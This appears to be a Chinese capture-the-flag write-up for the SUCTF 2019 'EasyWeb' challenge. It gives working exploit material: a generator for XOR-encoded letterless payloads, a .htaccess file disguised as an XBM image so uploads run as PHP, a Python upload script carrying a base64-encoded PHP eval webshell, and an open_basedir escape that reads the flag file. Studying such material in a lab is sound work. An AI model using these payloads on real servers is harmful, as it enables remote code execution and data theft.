[SUCTF 2019]EasyWeb

[SUCTF 2019]EasyWeb

知识点:

  • 无数字字母shell

  • 利用.htaccess上传文件

  • 绕过open_basedir

  • 绕过exif_imagetype()函数

    [SUCTF 2019]EasyWeb

    也就是将检查我们上传的文件,并返回一个常量,否则返回false,那我们要让.htaccess文件绕过它,就要针对它的检测特性去构造数据,因为它最终要返回常量,那我们就要让这个函数认为.htaccess为一个合法的图像类型

    其中常量包括:

    [SUCTF 2019]EasyWeb

    采用xbm格式,X Bit Map

    在这个文件中高和宽都是有#在前面的,那么我们即使把它放在.htaccess文件中也不会影响.htaccess的实际运行效果,所以新的.htaccess文件内容如下

    #define width 1337                          # Define the width wanted by the code (and say we are a legit xbitmap file lol)
    #define height 1337                         # Define the height
    
    AddType application/x-httpd-php .php16      # Say all file with extension .php16 will execute php
    
    php_value zend.multibyte 1                  # Active specific encoding (you will see why after :D)
    php_value zend.detect_unicode 1             # Detect if the file have unicode content
    php_value display_errors 1                  # Display php errors
    

解题:

源码:

 <?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER[‘REMOTE_ADDR‘]);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), ‘<?‘)!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET[‘_‘];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die(‘One inch long, one inch strong!‘);
}

if ( preg_match(‘/[\x00- 0-9A-Za-z\‘"\`~_&.,|=[\x7F]+/i‘, $hhh) )
    die(‘Try something else!‘);

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

我们就需要通过eval调用get_the_flag函数,然后上传马儿文件,

首先是不能有字母不能有数字,我们可以用脚本:

<?php
$payload = ‘‘;

for($i=0;$i<strlen($argv[1]);$i++)
{
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);  //dechex(255) = ff
        if($k == $argv[1][$i])
            $payload .= ‘%‘.dechex($j);
    }
}
echo $payload;

最后构成这样的paylod:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

再把phpinfo改成get_the_flag即可

绕过如下:

我们看到get_the_flag函数,可以知道,第一次过滤了ph字符串即不可以用php伪协议。第二次过滤了文件中有<?的,又因为用是php7点多所以<script>不可。第三次判断了文件是否为图片类型。

我们先上传一个.htaccess考虑到要让他上传后被正常解析且还要符合图片的格式,我们先到了htaccess中的#注释还有把该行用\x00开头,这样配置文件也会把该行作为无效行解析。这样我们就可以上传.htaccess文件了。

解释一下htaccess的配置信息的意思

AddType application/x-httpd-php .test   ###将1.test以php的方式解析
php_value auto_append_file  "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/1.test"
##在1.test加载完毕后,再次包含base64解码后的1.test,成功getshell,所以这也就是为什么会出现两次

上传的1.test也需要进行绕过,可以使用base64编码绕过,也可以是utf16

import requests
import base64
url="http://48526d4d-1118-40c3-895f-b7cd0eeb5b02.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"
htaccess=b"""\x00\x00\x85\x48\x85\x18
AddType application/x-httpd-php .test
php_value auto_append_file  "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481/1.test"    ##这里需要替换为自己上传的文件名

"""

shell=b"GIF89a"+b"aa"+base64.b64encode(b"<?php @eval($_POST[cmd])?>") #aa为了满足base64算法凑足八个字节

#first_upload ---- to upload .htaccess

files1={
	‘file‘:(‘.htaccess‘,htaccess,‘image/jpeg‘)
}
r1=requests.post(url=url,files=files1)
print (r1.text)

#second_upload ---- to upload .shell
#
files2={
	‘file‘:(‘1.test‘,shell)
}
r1=requests.post(url,files=files2)
print (r1.text)

访问http://48526d4d-1118-40c3-895f-b7cd0eeb5b02.node3.buuoj.cn/upload/tmp_a124eb0000450f51750619887472f40f/1.test即可,连接上蚂蚁的剑,发现限制了目录穿越,直接:

/upload/tmp_a124eb0000450f51750619887472f40f/1.test?cmd=chdir(‘img‘);ini_set(‘open_basedir‘,‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);ini_set(‘open_basedir‘,‘/‘);print_r(file_get_contents(‘/THis_Is_tHe_F14g‘));

即可

[SUCTF 2019]EasyWeb

上一篇:JS截取字符串


下一篇:vue-cli脚手架build目录中的webpack.base.conf.js配置文件